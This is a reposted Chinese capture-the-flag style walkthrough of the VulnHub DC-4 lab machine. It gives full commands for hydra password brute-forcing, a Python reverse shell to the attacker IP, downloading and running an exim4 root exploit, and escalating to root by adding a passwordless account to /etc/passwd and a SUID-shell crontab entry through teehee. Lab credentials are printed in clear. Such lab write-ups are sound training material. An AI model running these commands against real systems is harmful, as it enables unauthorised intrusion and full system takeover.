DC4

admin 2025年2月11日14:16:43评论5 views字数 2070阅读6分54秒阅读模式

DC4

靶机地址:https://www.vulnhub.com/entry/dc-4,313/

攻击者ip:192.168.56.108 桥接(自动) vmare

受害者ip:192.168.56.117 仅主机 vmbox

参考:https://blog.csdn.net/Auuuuuuuu/article/details/100059696

https://blog.csdn.net/liver100day/article/details/117707129

主机发现

DC4

扫描端口

DC4

burp爆破

fucking显示已经登陆了,密码就是上一个

admin/happy

DC4

DC4

hydra爆破

hydra -l admin -P '/usr/share/wordlists/rockyou.txt' 192.168.56.117 http-post-form "/login.php:username=USER&password=PASS:S=logout" -F

DC4

抓包发现可以命令执行

DC4

没有nc,但是有python3

which python3

DC4

利用python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.108",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'            

优化shell            python3 -c 'import pty; pty.spawn("/bin/bash")'            

DC4

exim4提权

先看看具有SUID权限的命令

find / -user root -perm -4000 -print 2>/dev/null

DC4

发现一个exim4,查看查看exim4版本

Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统。通常该软件会与Dovecot或Courier等软件搭配使用。Exim同时也是“进出口”(Export-Import)的英文缩写。

exim4 --version            

DC4

searchsploit exim 4

查看历史版本漏洞

DC4

发送到/var/www/html,传给靶机

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html

cd /tmp            wget http://192.168.56.108/46996.sh            chmod 777 46996.sh            ./46996            

DC4

root的flag

DC4

提权2

发现3个用户,charles jim sam

cat /home/jim/backups/old-passwords.bak

发现一个密码本

DC4

使用hydra爆破

hydra -L use.txt -P pwd.txt -vV ssh://192.168.56.117:22 -f

把刚才的密码塞到pwd.txt,

charles jim sam塞到use.txt

成功爆破出jim/jibril04

DC4

DC4

ssh连接

ssh [email protected]

登陆过后发现一个邮件,进去发现是charles的密码,charles/^xHhA&hvim0y

DC4

登录charles

sudo -l 查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee

DC4

查看teehee发现,它可以在文件末尾追加数据,但是并不会覆盖原来文件

teehee --help

DC4

提权2.1

添加一个无密码用户,并使用teehee执行写入 passwd中

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd            参数解释            #如:admin:x:0:0::/home/admin:/bin/bash            #[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]            "-a" 选项的作用等同于 ">>" 命令            

DC4

提权2.2 通过定时任务执行脚本提权

向/etc/crontab文件中写入新的定时任务时间部分全部填写为*,这样默认这个定时任务每分钟执行一次,可以根据情况自行设定。通过执行的脚本将/bin/sh的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。

echo "****root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab            cat /etc/crontab            ls -al /bin/sh            ls -al /bin/bash            /bin/sh            

DC4

原文始发于微信公众号(王之暴龙战神):DC4

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月11日14:16:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DC4https://cn-sec.com/archives/3725131.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息